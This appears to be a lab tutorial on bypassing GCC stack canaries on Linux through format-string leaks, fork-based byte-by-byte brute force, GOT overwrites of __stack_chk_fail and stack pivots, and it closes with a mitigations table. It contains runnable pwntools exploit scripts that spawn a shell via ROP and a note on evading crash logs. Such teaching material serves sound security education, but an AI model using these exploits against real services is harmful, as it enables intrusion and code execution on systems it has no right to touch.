Bypassing GCC Stack Canaries on Linux

GCC’s stack canary (the “stack smashing protector”, SSP) places a random word between local variables and the saved return address. The function epilogue re-reads that word and aborts via __stack_chk_fail if it changed. A linear stack overflow that overwrites the saved RIP must also overwrite the canary — and unless you know its value, the program dies before ret ever runs.

This tutorial covers four practical bypasses: leaking the canary with a format string, brute-forcing it byte by byte across fork(), redirecting __stack_chk_fail in the GOT, and pivoting around the check entirely. It also covers what does not work, because students burn a lot of time on those paths.

Note

Lab Binary This tutorial uses the target binary from the Linux Exploitation Lab (14-stack-canaries/). See the setup guide for build instructions.

How GCC Stack Canaries Actually Work

The common flavours

GCC offers several stack protector modes. These are the common ones you will see in exploitation labs and distro builds:

Flag	Functions instrumented
`-fstack-protector`	Functions with a `char` buffer larger than 8 bytes
`-fstack-protector-strong`	Functions with any local array, `alloca`, or address-taken locals
`-fstack-protector-all`	Every function frame, regardless of contents
`-fstack-protector-explicit`	Only functions annotated with `stack_protect`

Most Linux distros build user binaries with -strong. Glibc, the kernel, and security-sensitive libraries use -all for hot paths.

Where the canary lives

On x86_64, the canary is loaded from the Thread Local Storage block at offset 0x28:

mov    rax, QWORD PTR fs:0x28

On i386, it lives at gs:0x14. The TLS block itself is set up by glibc. Modern glibc initializes the canary from the kernel-provided AT_RANDOM auxiliary vector via _dl_setup_stack_chk_guard(), then stores the result in TLS.

The all-zero low byte

The least significant byte of the canary is always \x00 on glibc. This is by design, not by accident: it terminates C strings, so a strcpy() or gets() overflow into the canary leaves the byte that gets compared back as zero — which means strcpy cannot trivially copy a forged canary in. Do not confuse this with weakness: the byte is a deliberate barrier, not a leaked secret. The remaining 7 bytes are random.

Prologue and epilogue

A function with a vulnerable buffer compiled with -fstack-protector-strong looks like this:

; --- prologue ---
push   rbp
mov    rbp, rsp
sub    rsp, 0x130
mov    rax, QWORD PTR fs:0x28        ; load canary from TLS
mov    QWORD PTR [rbp-0x8], rax       ; store on stack just below saved RBP
xor    eax, eax

; ... function body, gets(buf), etc ...

; --- epilogue ---
mov    rax, QWORD PTR [rbp-0x8]       ; reload from stack
sub    rax, QWORD PTR fs:0x28         ; compare against TLS copy
jne    .stack_chk_failed              ; mismatch -> die
leave
ret
.stack_chk_failed:
call   __stack_chk_fail@plt

__stack_chk_fail calls __fortify_fail, which prints a “stack smashing detected” diagnostic through glibc’s fatal-message path and then aborts. The diagnostic does not include the canary value. Whether a remote attacker sees the text depends on how the service wired file descriptor 2; in many inetd-style services stderr is not connected to the attacker’s socket, so the observable signal is just a dropped connection.

Stack layout

High addr
  +---------------------------+
  | saved RIP                 |  <- ret target
  +---------------------------+
  | saved RBP                 |
  +---------------------------+
  | canary  (8 bytes, low=00) |  <- compared in epilogue
  +---------------------------+
  | local variables           |
  | char buf[256]             |  <- overflow source
  +---------------------------+
Low addr (RSP)

A linear overflow walks low-to-high: buffer -> canary -> saved RBP -> saved RIP. To reach RIP you must write through the canary. If your write doesn’t preserve the canary’s exact value, you abort.

Thread and fork behavior

On mainstream glibc, new threads receive a copy of the creating thread’s stack guard in their TLS. That means a leak from one thread is generally useful elsewhere in the same process unless the program or runtime explicitly rekeys guards. Forking servers are even simpler: the child inherits the parent’s address space, including the TLS block holding the canary.

Initial Analysis

checksec ./target

RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE

Disassemble main to confirm a real GCC canary (not a hand-rolled integrity word):

objdump -d -M intel ./target | grep -A2 -B2 'fs:0x28'

  401234:  64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28
  40123b:  00 00
  40123d:  48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax
  ...
  4012a5:  48 8b 45 f8             mov    rax,QWORD PTR [rbp-0x8]
  4012a9:  64 48 33 04 25 28 00    xor    rax,QWORD PTR fs:0x28
  4012b0:  00 00
  4012b2:  74 05                   je     4012b9 <main+0x85>
  4012b4:  e8 87 fd ff ff          call   401040 <__stack_chk_fail@plt>

The xor form is what newer GCC emits; older versions used sub plus jne. Same effect.

Bypass 1: Leak via Format String

If you have a format-string bug before the overflow, leak the canary, then splice it back into the overflow payload at the right offset.

See Format String Vulnerabilities on x86 for the mechanics. Quick recap: %N$p reads the Nth stack argument as a pointer and prints it.

Finding the canary’s format-string offset

./target
> %1$p %2$p %3$p ... %30$p
0x7ffe1234abcd 0x4011a0 ... 0xb4d3f8c1e2a70000

Pick the value with a zero low byte and the high entropy of a typical TLS guard — it stands out. In a default 64-bit frame compiled at -O0 with one local char buf[256], the canary typically lands at %17$p (vararg slot) or somewhere around %23$p once buffers and saved registers are accounted for. Verify in GDB:

gdb-peda$ b *main+EPILOGUE_OFFSET
gdb-peda$ run
gdb-peda$ x/gx $rbp-0x8
0x7fffffffe418: 0xb4d3f8c1e2a70000

Two-shot exploit

If the program loops (read -> print -> read -> print, then eventually return), one request leaks, the next overflows:

from pwn import *

context.arch = 'amd64'
io = remote('target', 5556)

# Stage 1: leak canary
io.sendlineafter(b'> ', b'%23$p')
canary = int(io.recvline().strip(), 16)
log.info(f'canary = {canary:#018x}')
assert canary & 0xff == 0, 'low byte must be zero'

# Stage 2: overflow with canary preserved
buf  = b'A' * 264                 # buffer fill up to canary
buf += p64(canary)                # restore canary
buf += b'B' * 8                   # saved RBP (any value)
buf += p64(pop_rdi) + p64(sh_str) # ROP starts here
buf += p64(system_plt)
io.sendlineafter(b'> ', buf)
io.interactive()

The 264-byte fill assumes a char buf[256] plus 8 bytes of other locals; adjust to your binary. Use a cyclic pattern to find the exact canary offset if you don’t know it.

Bypass 2: Brute Force Across Forks

When a server uses accept() -> fork() -> handle, every child inherits the parent’s address space, including the TLS block holding the canary. Crash one child and the parent forks another with the same canary. This is the classic socat/inetd/xinetd setup, and it is the canary’s worst case.

Why it works

fork() performs a copy-on-write clone of the parent’s pages. TLS lives in the parent and is copied into the child intact. The child’s fs:0x28 returns the same 8 bytes the parent had. Crashing the child does not perturb the parent’s TLS, and the next fork() produces another child with the same value.

This does not work if:

The server exec()s a fresh binary per connection (new process image -> new TLS -> new canary).
The service restarts the whole binary on crash (e.g. systemd restart-on-failure).
The service uses pre-fork worker pools where workers are recycled via exec.

The bypass requires fork() without exec(). Make sure of this before sinking 1700 requests into nothing.

Byte-by-byte walk

The low byte is \x00. The other 7 bytes are random but fixed across forks. Brute force one byte at a time:

Set canary[0] = \x00 (known).
For each of canary[1..7]: try values \x00 through \xff until the child does not crash.
A wrong byte triggers __stack_chk_fail -> abort() -> connection drops. A right byte means the function returns normally — the connection persists, output appears, whatever the program does after the vulnerable function happens.
After 7 bytes, you have the full canary.

Worst case 256 * 7 = 1792 connections; average case ~896. Trivially fast over localhost or a LAN.

pwntools brute forcer

Assume the vulnerable function reads exactly BUFLEN + 8 bytes and returns. If the canary is correct, a known confirmation byte gets echoed; if not, the connection drops mid-write.

from pwn import *
import socket

HOST, PORT = 'target', 5556
BUFLEN = 264                # buffer size up to canary

def try_prefix(prefix):
    """Send overflow with `prefix` as the start of the canary.
    Return True if the child survived past the canary check."""
    try:
        io = remote(HOST, PORT, timeout=2)
        # pad the canary to 8 bytes; the unknown tail can be anything
        canary = prefix + b'\x00' * (8 - len(prefix))
        payload = b'A' * BUFLEN + canary
        # do NOT include any extra bytes -- we only want to overwrite up to
        # the canary, not RBP/RIP. The canary check fires at function return,
        # before RIP is consumed.
        io.send(payload)
        # Probe: if the canary matched, the function returned and the program
        # sent its normal post-function output. If it mismatched, abort()
        # killed the child and recv() returns empty.
        data = io.recv(timeout=1)
        io.close()
        return len(data) > 0
    except (EOFError, socket.error):
        return False

canary = b'\x00'                                    # low byte is always 0
for byte_idx in range(1, 8):
    log.info(f'brute byte {byte_idx}')
    for guess in range(256):
        candidate = canary + bytes([guess])
        if try_prefix(candidate):
            canary = candidate
            log.success(f'byte {byte_idx} = {guess:#04x}  canary so far = {canary.hex()}')
            break
    else:
        log.failure(f'byte {byte_idx}: no value worked -- check your assumptions')
        break

log.success(f'full canary: {canary.hex()}')

Probe quality matters

The above relies on “did we get any data back” as the oracle. That is brittle. Better oracles:

Time the response. A surviving child does some work; a crashing child returns near-instantly when abort() runs. Measure both and pick a threshold.
Look for a specific byte the program prints only on the success path.
Use a two-stage payload: overflow, then send a second message; only a surviving child reads the second message.

Pick whichever distinguishes survival from crash most reliably for your target.

Caveat: where the overflow stops

For brute force, only overwrite up to and including the canary. Do not overwrite the saved RBP or RIP yet. The canary is checked before ret, so the saved RIP is irrelevant during the brute-force phase, and corrupting RBP can cause leave to fault before the check, giving you a false negative (process dies but not via the canary path).

Once you have the full canary, do a final exploit shot that includes the canary plus a full ROP chain.

Bypass 3: Overwriting `__stack_chk_fail` in the GOT

If you have a write primitive independent of the canary path — a format-string %hn write, an arbitrary-write heap bug, an out-of-bounds array write — you can redirect __stack_chk_fail@got.plt to a function of your choice. The canary check still happens, the mismatch is still detected, but the call goes somewhere harmless or attacker-controlled.

Useful targets to redirect to:

exit — silently terminate without abort/SIGABRT and without printing the diagnostic. Useful in info-leak contexts where you’ve already extracted what you need.
A one-gadget in libc (execve("/bin/sh", 0, 0) style) — if libc is leaked, redirect straight to a one-gadget. The constraints (specific register/stack states) often happen to be satisfied at the canary-check site because the function frame is still intact.
A jump back into the binary’s code — e.g. into a shellcode buffer whose address you control.

Finding the GOT entry

objdump -R ./target | grep stack_chk_fail

0000000000404038 R_X86_64_JUMP_SLOT  __stack_chk_fail@GLIBC_2.4

0x404038 is the GOT slot. With Partial RELRO this slot is writable at runtime; with Full RELRO it is not (see below).

Skeleton: format string overwrite

Assume a format-string primitive that lets you write 2 bytes at a time via %hn:

from pwn import *

context.arch = 'amd64'
io = remote('target', 5556)

stack_chk_got = 0x404038
target_addr   = 0x4012e0          # function we want to call instead

# fmtstr_payload writes target_addr at stack_chk_got
# offset 6 = where our format-string buffer begins on the stack (verify!)
payload = fmtstr_payload(6, {stack_chk_got: target_addr})
io.sendline(payload)

# Now trigger the overflow. The canary check WILL detect the mismatch
# and call __stack_chk_fail@plt -- which now resolves to target_addr.
overflow  = b'A' * 264
overflow += b'CANARY!!'           # garbage, doesn't matter
overflow += b'B' * 8              # saved RBP
overflow += p64(0xdeadbeef)       # saved RIP, won't be reached
io.sendline(overflow)

io.interactive()

The trick is that the canary check now becomes the trigger for code execution rather than a kill switch. You don’t need to know the canary value at all — you want it to mismatch.

Constraint: lazy resolution path

__stack_chk_fail@plt typically goes through .got.plt (lazy resolution table), not the immutable .got. Partial RELRO leaves .got.plt writable. Full RELRO (-Wl,-z,relro,-z,now) resolves all symbols at load time and remaps .got.plt read-only. With Full RELRO, this whole bypass is dead — writing to 0x404038 will fault.

Check at runtime:

gdb-peda$ vmmap 0x404038
Start              End                Perm
0x0000000000404000 0x0000000000405000 r--p   # Full RELRO: read-only
0x0000000000404000 0x0000000000405000 rw-p   # Partial RELRO: writable

Why `exit` is the cleanest target

If you’ve already exfiltrated what you need (a leaked libc address, a flag, a token) before the overflow, redirecting __stack_chk_fail to exit lets the program terminate without the SSP diagnostic ever firing. No “stack smashing detected” line in the journal, no SIGABRT, no core dump. Stealth bypass.

Bypass 4: Stack Pivot Around the Check

The canary is checked in the function’s epilogue. If you can transfer control somewhere else without traversing that epilogue, the check never runs.

This is rare. Cases where it happens:

The vulnerable function calls something that itself takes a function pointer from the corrupted stack region (a corrupted vtable, an indirect call through a struct field). You hijack control before the canary check.
A heap or BSS bug overwrites a saved jump target used elsewhere. You return cleanly from the canary-protected function, then control flow reaches the corrupted pointer later.
An exception handler / longjmp / SIGSEGV handler is reachable. siglongjmp jumps to a saved context without unwinding the way ret does, skipping the canary check.

Brief mention only. If you have one of these primitives, you usually don’t need to think about the canary at all — just don’t disturb it.

What Doesn’t Work

”I’ll just guess the canary”

7 bytes of randomness = 2^56 possibilities. Without fork() reuse, a fresh canary per process means roughly 72 quadrillion guesses. Not happening.

”I’ll write whatever I want and hope”

Some students send \x00\x00\x00\x00\x00\x00\x00\x00 figuring “the low byte is zero, maybe the rest is too.” It isn’t. The other 7 bytes are random data initialized from AT_RANDOM. The probability of an all-zero canary is 1 in 2^56.

”PIE will protect me”

PIE randomizes the binary’s base address. It does not affect the canary at all — the canary lives in TLS, controlled by glibc, independent of PIE. A format-string leak gives you the canary regardless of whether the binary is PIE.

”The stack canary diagnostic will leak into my socket”

__stack_chk_fail emits a fatal diagnostic and aborts, but the message does not contain the canary value. Whether you see the text over the network depends entirely on how stderr is connected. Many services leave stderr on a terminal, a log, or /dev/null; some challenge harnesses wire it to the socket. Treat the abort as a crash oracle, not an information leak.

”Partial RELRO is the same as Full RELRO”

It isn’t. Partial RELRO marks .got (initial symbols) read-only but leaves .got.plt (lazy-resolved entries) writable. __stack_chk_fail is in .got.plt. Partial RELRO does not block Bypass 3. Always check with checksec or by inspecting page permissions.

Mitigations Summary

Mitigation	Blocks Bypass 1 (leak)	Blocks Bypass 2 (brute)	Blocks Bypass 3 (GOT)
`-fstack-protector` -> `-strong`	No	No	No
Full RELRO	No	No	Yes
`exec()` per connection (no fork)	No	Yes	No
No format-string vulnerability	Yes	No	No (if other write exists)

The combination that actually defeats these bypasses: Full RELRO + no format-string bug + no independent write primitive + fresh process state for each connection. Most production binaries lack at least one of these.

Key Takeaways

The canary lives in TLS at fs:0x28 on x86_64. The low byte is always \x00 by design.
fork() without exec() reuses the canary, enabling 1792-request byte-by-byte brute force.
A format-string leak ends the protection — read the canary, splice it into your overflow.
GOT overwrite of __stack_chk_fail turns the kill switch into a jump primitive, but only against Partial RELRO.
The diagnostic does not leak the canary. At most it gives you a crash/survival signal.
PIE does not interact with the canary. A leak is a leak whether or not the binary is position-independent.

How GCC Stack Canaries Actually Work

The common flavours

Where the canary lives

The all-zero low byte

Prologue and epilogue

Stack layout

Thread and fork behavior

Initial Analysis

Bypass 1: Leak via Format String

Finding the canary’s format-string offset

Two-shot exploit

Bypass 2: Brute Force Across Forks

Why it works

Byte-by-byte walk

pwntools brute forcer

Probe quality matters

Caveat: where the overflow stops

Bypass 3: Overwriting __stack_chk_fail in the GOT

Finding the GOT entry

Skeleton: format string overwrite

Constraint: lazy resolution path

Why exit is the cleanest target

Bypass 4: Stack Pivot Around the Check

What Doesn’t Work

”I’ll just guess the canary”

”I’ll write whatever I want and hope”

”PIE will protect me”

”The stack canary diagnostic will leak into my socket”

”Partial RELRO is the same as Full RELRO”

Mitigations Summary

Key Takeaways

Bypass 3: Overwriting `__stack_chk_fail` in the GOT

Why `exit` is the cleanest target